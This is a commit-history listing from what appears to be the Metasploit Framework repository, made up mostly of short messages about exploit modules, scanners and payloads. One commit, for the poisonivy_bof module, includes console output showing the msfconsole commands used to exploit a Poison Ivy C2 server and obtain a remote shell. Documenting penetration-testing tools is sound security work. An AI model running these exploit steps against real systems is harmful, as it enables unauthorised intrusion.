Commit Graph

18812 Commits (3e588ffd62f81978fdd557e83e41693486f1fc0e)

Author SHA1 Message Date
OJ b608abffbc Update payload cache sizes for x64 windows 2015-09-29 09:03:57 +10:00
jvazquez-r7 269641a0ff
Update vmauthd_login to take into account advanced TCP options 2015-09-28 14:38:35 -05:00
jvazquez-r7 2f46335c90
Update brocade_enbale_login to take into account advanced TCP options 2015-09-28 14:36:23 -05:00
jvazquez-r7 adb76a9223
Update telnet_login to take into account advanced TCP options 2015-09-28 14:35:58 -05:00
jvazquez-r7 0eed30ce05
Update pop3_login to take into account advanced TCP options 2015-09-28 14:29:50 -05:00
jvazquez-r7 d02193aaeb
Update mysql_login to take into account advanced TCP options 2015-09-28 14:28:32 -05:00
jvazquez-r7 0abb387c1a Update mssql_login to take into account advanced TCP options 2015-09-28 14:22:19 -05:00
jvazquez-r7 df3e4e8afd
Update ftp_login to take into account advanced TCP options 2015-09-28 14:18:05 -05:00
jvazquez-r7 a99e44b43a
Update vnc_login to take into account advanced TCP options 2015-09-28 14:13:08 -05:00
jvazquez-r7 4d8f0a6ec4
Update db2_auth to take into account advanced TCP options 2015-09-28 14:10:55 -05:00
jvazquez-r7 07b44fccb9
Update AFP login scanner to take into account advanced options 2015-09-28 14:03:55 -05:00
jvazquez-r7 1e4e5c5bae
Update ACPP login scanner to take into account advanced options 2015-09-28 13:50:20 -05:00
bigendian smalls a47557b9c1
Upd. multi/handler to include mainframe platform
Quick update to multi handler so it recognizes mainframe platform based
modules
2015-09-28 11:14:08 -05:00
Jon Hart 96e4e883ae
Fix #6008 for wireshark_lwres_getaddrbyname_loop 2015-09-27 14:56:11 -07:00
Jon Hart bd2f73f40a
Fix #6008 for wireshark_lwres_getaddrbyname 2015-09-27 14:55:19 -07:00
Jon Hart bbd08b84e5
Fix #6008 for snort_dce_rpc 2015-09-27 14:53:40 -07:00
Jon Hart 989fe49750
Fix #6008 for synflood 2015-09-27 14:50:59 -07:00
Jon Hart 7ad7db7442
Fix #6008 for rogue_send. Correctly. 2015-09-27 14:48:58 -07:00
Jon Hart 7b026676f1
Fix #6008 for avahi_portzero 2015-09-27 14:47:05 -07:00
Jon Hart 20ddb65ff8
Fix #6008 for bnat_scan 2015-09-27 14:18:51 -07:00
Jon Hart 06a10e136a
Fix #6008 for rogue_send 2015-09-27 14:12:23 -07:00
Jon Hart d3a41323b8
Fix #6008 for ipidseq.rb 2015-09-27 14:05:05 -07:00
Jon Hart 5b1ee8c8ca
Fix #6008 for syn.rb 2015-09-27 13:54:11 -07:00
Jon Hart 3888b793bd
Fix #6008 for ack.rb 2015-09-27 13:53:47 -07:00
Jon Hart 766829c939
Fix #6008 for xmas.rb 2015-09-27 13:46:00 -07:00
jvazquez-r7 b206de7708
Land #5981, @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit 2015-09-27 00:42:17 -05:00
jvazquez-r7 55f573b4c9
Do code cleanup 2015-09-27 00:33:40 -05:00
jvazquez-r7 c85913fd12
Land #5983, @jhart-r7's SOAP PortMapping UPnP auxiliary module 2015-09-26 15:47:04 -05:00
Brent Cook f3451eef75
Land #5380, pageantjacker, an SSH agent proxy 2015-09-26 10:52:44 -04:00
Brent Cook 46ed129966 update to metasploit-payloads 1.0.14 2015-09-26 10:50:20 -04:00
jvazquez-r7 f6f3efea75
print the body as verbose 2015-09-25 13:51:18 -05:00
jvazquez-r7 80c9cd4e6f
Restore required option 2015-09-25 13:41:27 -05:00
jvazquez-r7 e4e9609bc2
Use single quotes 2015-09-25 13:35:38 -05:00
jvazquez-r7 a5698ebce0
Fix metadata 2015-09-25 13:34:16 -05:00
jvazquez-r7 c8880e8ad6
Move local exploit to correct location 2015-09-25 11:37:38 -05:00
jvazquez-r7 6b46316a56
Do watchguard_local_privesc code cleaning 2015-09-25 11:35:21 -05:00
jvazquez-r7 c79671821d Update with master changes 2015-09-25 10:47:37 -05:00
jvazquez-r7 e87d99a65f
Fixing blocking option 2015-09-25 10:45:19 -05:00
jvazquez-r7 890ac92957
Warn about incorrect payload 2015-09-25 10:10:08 -05:00
jvazquez-r7 19b577b30a
Do some code style fixes to watchguard_cmd_exec 2015-09-25 09:51:00 -05:00
jvazquez-r7 b35da0d91d
Avoid USERNAME and PASSWORD datastore options collisions 2015-09-25 09:36:47 -05:00
jvazquez-r7 52c4be7e8e
Fix description 2015-09-25 09:35:30 -05:00
Balazs Bucsay a863409734 x86-64 pushq signedness error fixed. Signed port numbers (2 bytes) were not working properly. Fix means +6 bytes in shellcode length 2015-09-24 13:07:02 +02:00
JT e185277ac5 Update simple_backdoors_exec.rb 2015-09-24 14:14:23 +08:00
JT 56a551313c Update simple_backdoors_exec.rb 2015-09-24 13:54:40 +08:00
JT 192369607d Update simple_backdoors_exec.rb
updated the string 'echo me' to a random text
2015-09-24 13:49:33 +08:00
Brent Cook 9519eef55d
Land #5993, handle ADSI exceptions nicely 2015-09-23 22:56:44 -05:00
Meatballs 66c9222968
Make web_delivery proxy aware 2015-09-23 20:45:51 +01:00
Daniel Jensen 3dd917fd56 Altered the module to use the primer callback, and refactored some code to remove useless functions etc 2015-09-24 00:20:13 +12:00
Stuart 853d822992 Merge pull request #1 from bcook-r7/land-5380-pageantjacker
update pageantjacker to run as part of extapi
2015-09-23 09:45:53 +01:00
William Vu 44fa188e71
Land #5984, android_mercury_parseuri module 2015-09-23 02:44:53 -05:00
William Vu d798ef0885
Land #5893, w3tw0rk/Pitbul RCE module 2015-09-23 02:41:01 -05:00
jvazquez-r7 2b7ffdc312
Use datastore advanced options used by smb_login 2015-09-21 17:48:05 -05:00
William Vu 8106bcc320 Clean up module 2015-09-21 14:37:54 -05:00
jvazquez-r7 415fa3a244
Fix #5968, some modules not handling Rex::Post::Meterpreter::RequestError exceptions
* Related to the usage of ADSI on unsupported OSes
2015-09-21 14:33:00 -05:00
Stuart Morgan cdd39f52b1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into pageant_extension 2015-09-21 14:34:56 +02:00
Stuart Morgan e8e4f66aaa Merge branch 'master' of ssh://github.com/stufus/metasploit-framework into pageant_extension 2015-09-21 14:34:38 +02:00
Brent Cook 61e7e1d094 update pageantjacker to run as part of extapi 2015-09-20 20:25:00 -05:00
wchen-r7 fd190eb56b
Land #5882, Add Konica Minolta FTP Utility 1.00 CWD command module 2015-09-18 11:10:20 -05:00
wchen-r7 0aea4a8b00 An SEH? A SEH? 2015-09-18 11:09:52 -05:00
wchen-r7 060acbc496 newline 2015-09-17 11:39:39 -05:00
wchen-r7 08b5b8ebb2 Add ADDITIONAL_FILES option 2015-09-17 11:30:58 -05:00
joevennix 0d94b8a48f Make andorid_mercury_parseuri better 2015-09-17 09:59:31 -05:00
Jon Hart 0113cbd353
Nokogiri::XML::Builder instead 2015-09-16 19:53:33 -07:00
jvazquez-r7 927785cfe4
Land #5783, @jabra-'s module to disclose passwords from group policy preferences 2015-09-16 21:00:03 -05:00
jvazquez-r7 adab9f9548
Do final cleanup 2015-09-16 20:59:32 -05:00
jvazquez-r7 4d0d806e1d
Do minor cleanup 2015-09-16 19:30:40 -05:00
Brent Cook d2a17074b1
update payload sizes 2015-09-16 17:24:41 -05:00
jvazquez-r7 46168e816b Merge for retab 2015-09-16 17:13:08 -05:00
jvazquez-r7 ab8d12e1ac
Land #5943, @samvartaka's awesome improvement of poisonivy_bof 2015-09-16 16:35:04 -05:00
jvazquez-r7 af1cdd6dea
Return Appears 2015-09-16 16:34:43 -05:00
jvazquez-r7 402044a770
Delete comma 2015-09-16 16:23:43 -05:00
jvazquez-r7 75c6ace1d0
Use single quotes 2015-09-16 16:23:10 -05:00
jvazquez-r7 88fdc9f123
Clean exploit method 2015-09-16 16:14:21 -05:00
jvazquez-r7 d6a637bd15
Do code cleaning on the check method 2015-09-16 16:12:28 -05:00
wchen-r7 c7afe4f663
Land #5930, MS15-078 (atmfd.dll buffer overflow) 2015-09-16 15:33:38 -05:00
jvazquez-r7 688a5c9123
Land #5972, @xistence's portmapper amplification scanner 2015-09-16 14:58:19 -05:00
jvazquez-r7 8ae884c1fc Do code cleanup 2015-09-16 14:46:27 -05:00
jvazquez-r7 37d42428bc
Land #5980, @xistence exploit for ManageEngine OpManager 2015-09-16 13:19:49 -05:00
jvazquez-r7 8f755db850
Update version 2015-09-16 13:19:16 -05:00
jvazquez-r7 1b50dfc367
Change module location 2015-09-16 11:43:09 -05:00
jvazquez-r7 122103b197
Do minor metadata cleanup 2015-09-16 11:41:23 -05:00
jvazquez-r7 aead0618c7
Avoid the WAIT option 2015-09-16 11:37:49 -05:00
wchen-r7 b4aab70d18 Fix another typo 2015-09-16 11:34:22 -05:00
wchen-r7 bef658f699 typo 2015-09-16 11:32:09 -05:00
jvazquez-r7 0010b418d0
Do minor code cleanup 2015-09-16 11:31:15 -05:00
jvazquez-r7 f3b6606709
Fix check method 2015-09-16 11:26:15 -05:00
Daniel Jensen 7985d0d7cb Removed privesc functionality, this has been moved to another module. Renamed module 2015-09-16 23:29:26 +12:00
Daniel Jensen bdd90655e4 Split off privesc into a separate module 2015-09-16 23:11:32 +12:00
wchen-r7 63bb0cd0ec Add Android Mercury Browser Intent URI Scheme & Traversal 2015-09-16 00:48:57 -05:00
jvazquez-r7 24af3fa12e
Add rop chains 2015-09-15 14:46:45 -05:00
Mo Sadek e911d60195
Land #5967, nil bug fix in SSO gather module 2015-09-15 10:25:50 -05:00
William Vu abe65cd400
Land #5974, java_jmx_server start order fix 2015-09-15 01:33:44 -05:00
xistence c99444a52e ManageEngine EventLog Analyzer Remote Code Execution 2015-09-15 07:29:16 +07:00
xistence 7bf2f158c4 ManageEngine OpManager Remote Code Execution 2015-09-15 07:24:32 +07:00
JT 9e6d3940b3 Update simple_backdoors_exec.rb 2015-09-13 23:30:14 +08:00
wchen-r7 ae5aa8f542 No FILE_CONTENTS option 2015-09-12 23:32:02 -05:00
Daniel Jensen 4e22fce7ef Switched to using Rex MD5 function 2015-09-13 16:23:23 +12:00
xistence 0657fdbaa7 Replaced RPORT 2015-09-13 09:19:05 +07:00
xistence 521636a016 Small changes 2015-09-13 08:31:19 +07:00
jvazquez-r7 0d52a0617c
Verify win32k 6.3.9600.17837 is working 2015-09-12 15:27:50 -05:00
jvazquez-r7 9626596f85
Clean template code 2015-09-12 13:43:05 -05:00
Hans-Martin Münch (h0ng10) 0c4604734e Webserver starts at the beginning, stops at the end 2015-09-12 19:42:31 +02:00
xistence 79e3a7f84b Portmap amplification scanner 2015-09-12 16:25:06 +07:00
xistence dc8d1f6e6a Small changes 2015-09-12 13:08:58 +07:00
wchen-r7 01053095f9 Add MS15-100 Microsoft Windows Media Center MCL Vulnerability 2015-09-11 15:05:06 -05:00
William Vu 5f9f66cc1f Fix nil bug in SSO gather module 2015-09-11 02:21:01 -05:00
William Vu a1a7471154
Land #5949, is_root? for remove_lock_root 2015-09-11 02:09:14 -05:00
wchen-r7 e9e4b60102 move require 'msf/core/post/android' to post.rb 2015-09-11 01:58:12 -05:00
wchen-r7 f2ccca97e0 Move require 'msf/core/post/android' to post.rb 2015-09-11 01:56:21 -05:00
jvazquez-r7 53f995b9c3
Do first prototype 2015-09-10 19:35:26 -05:00
wchen-r7 017832be88
Land #5953, Add Bolt CMS File Upload Vulnerability 2015-09-10 18:29:13 -05:00
wchen-r7 602a12a1af typo 2015-09-10 18:28:42 -05:00
wchen-r7 94aea34d5b
Land #5965, Show the Shodan error message if no results are found 2015-09-10 17:39:25 -05:00
HD Moore cddf72cd57 Show errors when no results are found 2015-09-10 14:05:40 -07:00
wchen-r7 90ef9c11c9 Support meterpreter for OS X post modules 2015-09-10 15:57:43 -05:00
Roberto Soares 68521da2ce Fix check method. 2015-09-10 04:40:12 -03:00
Roberto Soares 4566f47ac5 Fix check method. 2015-09-10 03:56:46 -03:00
Roberto Soares 0ba03f7a06 Fix words. 2015-09-09 21:27:57 -03:00
Roberto Soares bc3f5b43ab Removed WordPress mixin. 2015-09-09 21:26:15 -03:00
Roberto Soares 4e31dd4e9f Add curesec team as vuln discovery. 2015-09-09 21:13:51 -03:00
Roberto Soares 6336301df3 Add Nibbleblog File Upload Vulnerability 2015-09-09 21:05:36 -03:00
Roberto Soares d3aa61d6a0 Move bolt_file_upload.rb to exploits/multi/http 2015-09-09 13:41:44 -03:00
Roberto Soares 2800ecae07 Fix alignment. 2015-09-09 01:21:08 -03:00
Roberto Soares 48bd2c72a0 Add fail_with method and other improvements 2015-09-09 01:11:35 -03:00
Roberto Soares f08cf97224 Check method implemented 2015-09-08 23:54:20 -03:00
Roberto Soares 6de0c9584d Fix some improvements 2015-09-08 23:15:42 -03:00
JT 31a8907385 Update simple_backdoors_exec.rb 2015-09-09 08:30:21 +08:00
jvazquez-r7 329e6f4633
Fix title 2015-09-08 15:31:14 -05:00
jvazquez-r7 30cb93b4df
Land #5940, @hmoore-r7's fixes for busybox post modules 2015-09-08 15:12:23 -05:00
wchen-r7 122d57fc20
Land #5945, Add auto-accept to osx/enum_keychain 2015-09-08 10:56:08 -05:00
wchen-r7 13afbc4eae Properly check root for remove_lock_root (android post module)
This uses the Msf::Post::Android::Priv mixin.
2015-09-08 10:40:08 -05:00
JT 4e23bba14c Update simple_backdoors_exec.rb
removing the parenthesis for the if statements
2015-09-08 15:47:38 +08:00
JT 002aada59d Update simple_backdoors_exec.rb
changed shell to res
2015-09-08 14:54:26 +08:00
JT 467f9a8353 Update simple_backdoors_exec.rb 2015-09-08 14:45:54 +08:00
JT 37c28ddefb Update simple_backdoors_exec.rb
Updated the description
2015-09-08 13:42:12 +08:00
JT 0f8123ee23 Simple Backdoor Shell Remote Code Execution 2015-09-08 13:08:47 +08:00
joev 1b320bae6a Add auto-accept to osx/enum_keychain. 2015-09-07 21:17:49 -05:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
xistence 1d492e4b25 Lots of X11 protocol changes 2015-09-06 15:55:16 +07:00
HD Moore ec5cbc842e Cosmetic cleanups 2015-09-05 22:56:11 -05:00
HD Moore 8c0b0ad377 Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00
JT 2f8dc7fdab Update w3tw0rk_exec.rb
changed response to res
2015-09-05 14:21:07 +08:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
wchen-r7 da0752e8c2 use fail_with 2015-09-04 15:12:05 -05:00
wchen-r7 7ab506dc06 Use Msf::Post::Android::System#get_build_prop to get the android ver
Instead of grabbing the android version from the module, this
is done by the mixin.
2015-09-04 15:05:45 -05:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
wchen-r7 5646f2e0c4 successful status should include last_attempted_at 2015-09-04 13:45:44 -05:00
wchen-r7 cf6d5fac2a Use the latest cred API, no more report_auth_info 2015-09-04 13:43:15 -05:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
jvazquez-r7 eaf51a2113
Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
jvazquez-r7 5dd0cee36a
Add comment 2015-09-04 13:30:00 -05:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
jvazquez-r7 8bfa5bcd09
Do some more minor code cleaning 2015-09-04 13:08:27 -05:00
jvazquez-r7 ac49c80367
Do minor code cleanup 2015-09-04 12:46:21 -05:00
jvazquez-r7 60d2856444
Use id instead of whoami 2015-09-04 12:02:21 -05:00
jvazquez-r7 4fa58efaa0
Allow to configure the DOWNLOAD_TIMEOUT 2015-09-04 11:54:22 -05:00
jvicente 2b2dec3531 Fixed typo direcotry. 2015-09-04 18:52:55 +02:00
jvazquez-r7 319bc2d750
Use downcase 2015-09-04 11:18:09 -05:00
Roberto Soares 6f4f8e34b4 Added method bolt_login. 2015-09-04 10:45:15 -03:00
wchen-r7 d55757350d Use the latest credential API, no more report_auth_info 2015-09-04 03:04:14 -05:00
Roberto Soares a195f5bb9e Initial commit - Skeleton 2015-09-04 04:09:16 -03:00
jvazquez-r7 ef6df5bc26
Use get_target_arch 2015-09-03 16:30:46 -05:00
jvazquez-r7 2588439246
Add references for the win32k info leak 2015-09-03 15:35:41 -05:00
Brent Cook e48bcb4e08
Land #5931, tweak titles 2015-09-03 14:52:52 -05:00
James Lee b2c401696b
Add certutil support.
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee 1e6a1f6d05 Revert "Fix spec like I shoulda done before landing #5736"
This reverts commit 956c8e550d.

Conflicts:
	spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
James Lee b4547711f3
Add certutil support.
Tested while landing #5736
2015-09-03 13:27:10 -05:00
jvazquez-r7 697a6cd335
Rescue the process execute 2015-09-03 13:03:36 -05:00
HD Moore f0ef035a0b Update the module titles to clarify what these do 2015-09-03 12:53:25 -05:00
HD Moore 630057e23f Implement suggestions from the PR discussion 2015-09-03 12:42:51 -05:00
HD Moore 57c8038f07 Merge branch 'master' into land-5413 2015-09-03 12:38:19 -05:00
jvazquez-r7 80a1e32339
Set Manual Ranking 2015-09-03 12:24:45 -05:00
HD Moore 0f1530adc1 Merge branch 'master' into land-5412 2015-09-03 12:22:00 -05:00
HD Moore 6e4ae1238b
Land #5791, show the VHOST in module output 2015-09-03 11:36:19 -05:00
HD Moore b8eee4a9e4 Show the IP address if it doesn't match the VHOST 2015-09-03 11:35:38 -05:00
HD Moore 9b51352c62
Land #5639, adds registry persistence 2015-09-03 11:26:38 -05:00
HD Moore 1b021464fe
Land #5919, remove deprecated VMware modules & update resource script. 2015-09-03 10:23:48 -05:00
jvazquez-r7 dbe901915e
Improve version detection 2015-09-03 09:54:38 -05:00
jvazquez-r7 394b1155b2 Apply stager patch in master 2015-09-03 08:30:09 -05:00
Brent Cook 1440f31756
Land #5637, resiliency improvements to TCP stagers 2015-09-02 22:50:12 -05:00
OJ 3fd9e0311c Update payload sizes 2015-09-03 12:01:11 +10:00
jvazquez-r7 de25a6c23c
Add metadata 2015-09-02 18:32:45 -05:00
HD Moore 9f9bbce034
Land #5840, add LLMNR & mDNS modules 2015-09-02 18:30:29 -05:00
HD Moore 0120e5c443 Cosmetic tweaks, don't report duplicate responses 2015-09-02 18:30:03 -05:00
jvazquez-r7 8f70ec8256
Fix Disclosure date 2015-09-02 18:21:36 -05:00
jvazquez-r7 b912e3ce65
Add exploit template 2015-09-02 17:28:35 -05:00
Jon Hart 42a2a86f32
Back out all changes to ms11_030_dnsapi 2015-09-02 13:53:10 -07:00
Jon Hart 6d1ab101ed
Back out all changes to llmnr_response 2015-09-02 13:52:38 -07:00
HD Moore 4090c2c8ea
Land #5880, adds ScriptHost UAC bypass for Win7/2008 2015-09-02 14:14:18 -05:00
Meatballs 582cc795ac
Remove newlines 2015-09-02 19:42:04 +01:00
HD Moore 43d3e69fb2
Land #5917, update local exploit checks 2015-09-02 12:55:45 -05:00
HD Moore 126fc9881e Cleanup and tweaks 2015-09-02 12:48:53 -05:00
Jon Hart 3d04d53e3a
first pass at better output and report_service 2015-09-02 10:31:46 -07:00
JT b89b6b653a Update trace.rb 2015-09-03 01:26:45 +08:00
JT 73bf812dfd Update trace.rb
removed the cookie
2015-09-03 00:35:23 +08:00
JT 5ecee6aaba Update trace.rb
removed some spaces so that msftidy will be happy
2015-09-03 00:27:22 +08:00
JT 34e0819a6e Modified the HTTP Trace Detection to XST Checker
This was suggested by HD Moore in https://github.com/rapid7/metasploit-framework/pull/5612
2015-09-03 00:19:08 +08:00
HD Moore 95b9208a63 Change recv to get_once to avoid indefinite hangs, cosmetic tweaks. 2015-09-02 10:30:19 -05:00
xistence a81a9e0ef8 Added TIME_WAIT for GUI windows 2015-09-02 16:55:20 +07:00
Meatballs 8f25a006a8
Change to automatic target 2015-09-02 09:13:25 +01:00
Waqas Ali 8e993d7793 Remove deprecated vmware modules 2015-09-02 13:00:15 +05:00
wchen-r7 0c4b020089
Land #5913, Add WP NextGEN Gallery Directory Traversal Vuln 2015-09-02 00:01:35 -05:00
wchen-r7 4275a65407 Update local exploit checks to follow the guidelines.
Please see wiki "How to write a check() method" to learn how
these checkcodes are determined.
2015-09-01 23:26:45 -05:00
HD Moore 347698e93f
Land #5915, fix a warning with the regex 2015-09-01 23:08:01 -05:00
HD Moore 381297ba93 Fix the regex flags 2015-09-01 23:07:48 -05:00
Roberto Soares 626704079d Changed output store_loot 2015-09-02 00:18:10 -03:00
Roberto Soares 96600a96ab Changed html parse by @wchen-r7 2015-09-01 22:03:21 -03:00
Alexander Salmin 3c72467b7d Fixes bug where "cert.rb:47: warning: flags ignored" happens due to some issuer patterns. 2015-09-02 01:02:46 +02:00
Brent Cook 56a1cfd9c8 updated cached payload sizes 2015-09-01 18:02:16 -05:00
Brent Cook 9dd14eb747 Merge branch 'upstream-master' into land-5899-android 2015-09-01 17:11:58 -05:00
Meatballs 27775fbe58
Restrict to 7 and 2k8 2015-09-01 22:23:37 +01:00
HD Moore cd65478d29
Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Roberto Soares 35661d0182 Add WP NextGEN Gallery Directory Traversal Vuln 2015-09-01 13:28:04 -03:00
Christian Mehlmauer bfc24aea16
change exitfunc to thread 2015-09-01 10:52:25 +02:00
Christian Mehlmauer 115f409fef
change exitfunc to thread 2015-09-01 10:48:07 +02:00
Christian Mehlmauer 5398bf78eb
change exitfunc to thread 2015-09-01 10:46:54 +02:00
Christian Mehlmauer 3e613dc333
change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17
change exitfunc to thread 2015-09-01 10:42:15 +02:00
James Lee 1b778d0650
Land #5898, use gem version of php & python meterp 2015-08-31 16:16:36 -05:00
HD Moore ff6fbfa738
Land #5895, rework of ADSI modules 2015-08-31 14:10:41 -07:00
Brent Cook d670a62000
Land #5822, migrate obsolete payload compatibility options 2015-08-31 15:20:20 -05:00
Jon Hart 9a2696aed4
Add Reference 2015-08-31 12:03:17 -07:00
Jon Hart c14cae1425
Make INTERNAL_PORT optional, allowing DELETE to work 2015-08-31 11:30:18 -07:00
Jon Hart 44813370d5
Better name, description and author 2015-08-31 10:42:50 -07:00
Jon Hart 8665134691
Add add/delete action. update logging. rename module again 2015-08-31 10:22:36 -07:00
Jon Hart 436910b25f
Clean up map description 2015-08-28 15:49:29 -07:00
Jon Hart e6e05814d0
Use an OptAddress instead, revert back to client name 2015-08-28 15:43:04 -07:00
Jon Hart 66616eeb95
Remove unused 2015-08-28 15:38:23 -07:00
Jon Hart 35555f5f24
Make most everything configurable and provide useful output 2015-08-28 15:36:49 -07:00
Jon Hart 13dd8222ec
Expose lease duration as an option 2015-08-28 15:22:19 -07:00
Jon Hart d57041136f
Use random port mapping description 2015-08-28 15:09:58 -07:00
Jon Hart 840be71683
Add support for specifying protocol
UDP is fun too.  Are there others?
2015-08-28 14:53:41 -07:00
Jon Hart 45fde928fc
More minor style cleanup 2015-08-28 14:49:57 -07:00
Jon Hart ba95a7d2ac
Convert to using HttpClient 2015-08-28 14:47:13 -07:00
Jon Hart a0aaf93f27
Relocate module to more correct location 2015-08-28 14:20:33 -07:00
Jon Hart 45c2422981
First pass at style cleanup 2015-08-28 14:19:28 -07:00
Jon Hart cba3650488
report_service for mdns/llmnr query 2015-08-28 14:04:52 -07:00
wchen-r7 0c7d2af6bc
Land #5750, Add WP All In One Migration Export Module 2015-08-28 14:12:14 -05:00
wchen-r7 837b6a4f71 Update description 2015-08-28 14:11:51 -05:00
wchen-r7 d2e758ac8b Better failure handling 2015-08-28 14:08:29 -05:00
wchen-r7 3d4cb06c67
Land #5807, Added Module WP Mobile Pack Vuln 2015-08-28 13:43:00 -05:00
wchen-r7 9e7f6d6500 Typos 2015-08-28 13:42:37 -05:00
wchen-r7 9364982467
Land #5665, Add osx rootpipe entitlements exploit for 10.10.3 2015-08-28 13:33:16 -05:00
jvazquez-r7 9c7f97d124
Fix methods name schema 2015-08-28 13:26:52 -05:00
wchen-r7 e45347e745 Explain why vulnerable 2015-08-28 13:26:01 -05:00